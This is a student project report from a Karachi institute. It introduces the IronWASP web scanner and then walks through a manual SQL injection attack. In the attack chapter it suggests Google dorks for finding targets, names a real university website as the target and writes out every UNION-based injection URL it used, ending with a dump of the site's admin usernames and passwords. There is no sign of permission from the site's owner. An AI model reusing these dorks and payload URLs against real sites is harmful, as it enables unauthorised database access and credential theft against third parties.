Project Report

IRONWASP

Class Teacher
Sir Waqar Ahmed
PAF KIET

Submitted by
Muhammad BurhanShafaat

54596

DEPARTMENT OF COMPUTER SCIENCE

PAF Karachi Institute of Economics and Technology
28-D, Block 6, P.E.C.H.S, Karachi 75400
Dec 2014

PREFACE
It gives me a sense of satisfaction and pleasure at the same time while writing the
preface for the IRONWASPproject report. It took several weeks of immense hard work and
tiredness to complete this project.
My intention has been to produce a report which covers completely all the aspects of
this project. Therefore, I have presented the project report in a way which is accessible to
everyone.
As use of the computers in industry, commerce, education and many other fields of
life have become very common; the question of information and system security arises.
Avoiding attacks on information and network wouldnt be that easy. It requires a lot of effort
to avoid these attacks. This report discusses SQL injection vulnerability identification and
attacking.
A thorough study has been carried out of the topic. All the material has been collected
in relevance with the SQL injection vulnerability. This report is carefully designed to offer
information appropriate for SQL Injection vulnerability. All the topics are comprehensively
dealt with to give reader a firm grounding in the issue. Explanations of concepts and
principles are concise and written in clear and simple language with supportive illustrations
where required. Different diagrams are provided to make this report even more logical and
understandable for the reader.

Muhammad Burhan

ii

ACKNOWLEDGMENT
First of all, I thank Almighty Allah who praised me with the ability to think, work and
deliver what I was assigned to do. Without His mercy it was not possible at all.
Secondly, I am grateful to my teacher Mr. Waqar Ahmed who was always there to
guide me and sort out my problems. I also acknowledge my all teachers, who throughout my
studies help me and guide me, departmental staff, and university staff.
I then wish to show appreciation to all those individuals who have helped me in any
way, in the making of this project

Muhammad Burhan

iii

TABLE OF CONTENTS

PREFACE

ii

ACKNOWLEDGEMENTS

iii

TABLE OF CONTENTS

iv

Chapter 1

INTRODUCTION

01

Objective
Theoretical Background
Project Scope

01
01
02

IRONWASP

03

Introduction to Iron WASP

Reason for Iron WASP Selection

03
04

LAUNCHING ATTACK

05

How to Find Target?

Target
Start Attack

05
05
07

CONCLUSION

11

Conclusion

11

1.1
1.2
1.3

Chapter 2
2.1
2.2

Chapter 3
3.1
3.2
3.3

Chapter 4
4.1

Appendix A
A.1

REFERENCES

WEB References

12
12

iv

INTRODUCTION
1

Introduction
This chapter gives a brief introduction to the project. It provides the objective,

theoretical background and project scope.

1.1

Objective
The aim of my project is to attack on a website using IRONWASP for SQL Injection

vulnerability detection and also attack on effected website using SQL Injection.

1.2

Theoretical Background
What is SQL injection?
SQL injection is a code injection technique, used to attack data-driven
applications, in which malicious SQL statements are inserted into an entry field for
execution (e.g. to dump the database contents to the attacker).

What is software vulnerability?

Software vulnerability is a security flaw, glitch, or weakness found
insoftware or in an operating system (OS) that can lead to security concerns. An
example of a software flaw is a buffer overflow.

What is IronWASP?

IronWASP(Iron Web application Advanced Security testing Platform) is one

of the world's best web vulnerability scanners.

1.3

Project Scope
1- To understand and demonstrate the working of Iron Wasp.
2- Identify vulnerability using Iron Wasp.
3- Perform attack using SQL Injection.

vi

CHAPTER 2

IRONWASP
2

Iron WASP
This chapter gives you introduction to Iron WASP. It provides introduction and

reason for the selection of Iron WASP.

2.1

Introduction to Iron WASP

WASP(Iron Web application Advanced Security testing Platform) is one of the

world's best web vulnerability scanners. It is developed by LavakumarKuppan. It is

designed to make automated scanning and testing an easy process. It is an open source system
for web application vulnerability testing. It is designed to be customizable to the extent where
users can create their own custom security scanners using it. Though an advanced user with
Python/Ruby scripting expertise would be able to make full use of the platform, a lot of the
tool's features are simple enough to be used by absolute beginners.

vii

Figure 1: Iron WASP Interface

2.2

Reasons for Iron WASP Selection

1- It's Free and Open source.
2- GUI based and very easy to use, no security expertise required.
3- Powerful and effective scanning engine.
4- Supports recording Login sequence.
5- Reporting in both HTML and RTF formats.
6- Checks for over 25 different kinds of web vulnerabilities.
7- False Positives detection support.
8- False Negatives detection support.
9- Industry leading built-in scripting engine that supports Python and Ruby.
10- Extensible via plug-ins or modules in Python, Ruby, C# or VB.NET.
11- Comes bundled with a growing number of Modules built by researchers in the
security community.

viii

CHAPTER 3

LAUNCHING ATTACK
2

Launching Attack
This chapter gives you idea how to launch attack? It provides details regarding the

target and launching the attack.

2.1

How to find the target?

Search on www.google.com using following key words will help you to find target:
inurl: php?category=
inurl: php?id=
or with similar keywords

2.2

Target
My target is The Laureate Business School (website: http://www.thelaureate.edu.pk)

as shown in figure 2 which is affiliated with RPHAH International University.

ix

The university offers several under graduate programs (BS, BSc, BBA, etc) as well as
graduate programs (MBA, etc). Figure 3 shows that SQL injection detected on the university
website (i.e. http://www.thelaureate.edu.pk).

Figure 2: Target website.

Figure 3: SQL Injection Vulnerability Detected

2.3

Start Attack
Step 1: Use order by clause to find the number columns in table.
Use order by clause and increase column number 1, 2, 3 n till you get error.

For Example:
x

http://www.thelaureate.edu.pk/contents.php?id=10+order+by+1
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+2
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+3
:
:
http://www.thelaureate.edu.pk/contents.php?id=10+order+by+7
Figure 4 show that on 7th column we find following error as shown in figure 4 which
means that we have only 6 columns in table which is displaying data.

Figure 4: Shows error on 7th column.

Step 2: Finding columns that are displaying on page.

To find the columns that are displaying on web page we have use a union
query for example:
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,4,5,6+order+by+1

Figure 5: Displayed Columns.

Step 3: Using group_concat function.

To group_concat function is used to display all table names of the given
schema. For example:

xi

http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(table_n
ame)+,5,6+from+information_schema.tables+where+table_schema=database()+order+by+1
The above link displayed few tables belongs the current schema:
admin,e-news, email_group, email_management, image_gallery, images_listing, navigation,
navigation_bk, news_and_events, notice_board and pages.

Figure 6: Table names.

Step 4: Find hex of the target table.

We have to enter hex code for table name in the query to execute this
successfully. The admin table is looking more interesting. Therefore I find the hex code of
admin which is 61646d696e.

Step 5: Finding column names of the table.

Group_concat will be use to display the column names. For example:
http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,3,group_concat(column
_name)+,5,6+from+information_schema.columns+where+table_name=0x61646d696e+order
+by+1

Figure 7: Shows the column names of admin table.

Step 6: Retrieving data.

In last step I successfully retrieved the column names (i.e. username and
password). So I use the below mentioned URL to retrieve data. Figure 8 shows the results of
admin table.
xii

http://www.thelaureate.edu.pk/contents.php?id=10+union+select+1,2,+username+,+password
+,5,6+from+admin+order+by+1

Figure 8: Shows the data of admin table.

Step 7: Beyond this is not ethical.

I feel that moving ahead like delete, modify and inserting data into tables is
not ethical.

Chapter 3
CONCLUSION
3

Conclusion
As you have seen that I demonstrate the SQL injection technique. So we can insert,

update and delete any data and as well as database objects (like tables, views etc) using SQL
injection.
Therefore the desktop and web applications should be build on standards to avoid
attacks. Now-a-days there are several software products available which show the availability
of vulnerability in web and desktop applications.

xiii

APPENDIX A
WEB REFERENCES

Web References
[1]

http://www.thelaureate.edu.pk

(Target Website)

[2]

http://string-functions.com/string-hex.aspx (Convert String to Hex)

xiv